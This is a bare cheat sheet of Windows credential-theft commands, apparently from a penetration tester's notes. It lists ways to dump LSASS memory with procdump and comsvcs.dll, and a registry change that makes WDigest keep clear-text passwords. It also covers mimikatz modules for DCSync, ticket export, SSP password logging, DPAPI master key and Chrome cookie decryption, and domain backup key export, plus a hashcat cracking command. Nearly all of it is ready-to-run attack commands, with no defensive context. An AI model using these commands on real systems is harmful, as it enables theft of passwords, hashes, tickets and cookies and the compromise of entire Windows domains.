#Ways to dump credentials from memory
-Dumping LSASS from Task Manager
procdump.exe -accepteula -ma “lsass.exe” out.dmp
procdump.exe -accepteula -ma 580 out.dmp
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa
sekurlsa::minidump c:\lsass.dmp
pypykatz lsa minidump lsass.DMP
#Enable WDigest to store clear-text credentials
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
sekurlsa::tickets /export
kerberos::ptt <file>.kirbi
lsadump::dcsync /user:dcorp\krbtgt
#Cached logons. Can’t perform “pass-the-hash” style attacks with this type of hash.
"token::elevate" "lsadump::cache"
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable
#Restore NT hash of a user
lsadump::setntlm /user:<user> /ntlm:<hash>
#Export private certificates
Invoke-Mimikatz –DumpCerts
#SSP Attack: Store passwords of all logins in clear-text to c:\Windows\System32\mimilsa.log
"privilege::debug" "misc::memssp"
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
#List plain-text creds [Risky]
dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
#Grab GUID Master Key value
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>
#Grab Master Key to Decrypt
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>
#Dump Domain-wide DPAPI Backup Key from DC
lsadump::backupkeys /system:<DC> /export
#Decrypt target user's master key using DPAPI Backup key
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"
#Decrypt cookie values with target user's master key
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
#Crack masterkey with user's clear-text pass
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected
#Without knowing the password, but with code exec, extract domain key from DC
dpapi::masterkey /in:"%appdata\Microsoft\Protect\<SID>\<Master-key-GUID> /rpc
#Decrypt credentials from Windows Vault using master key
dpapi::creds /in:<creds> /masterkey:<masterkey> /unprotect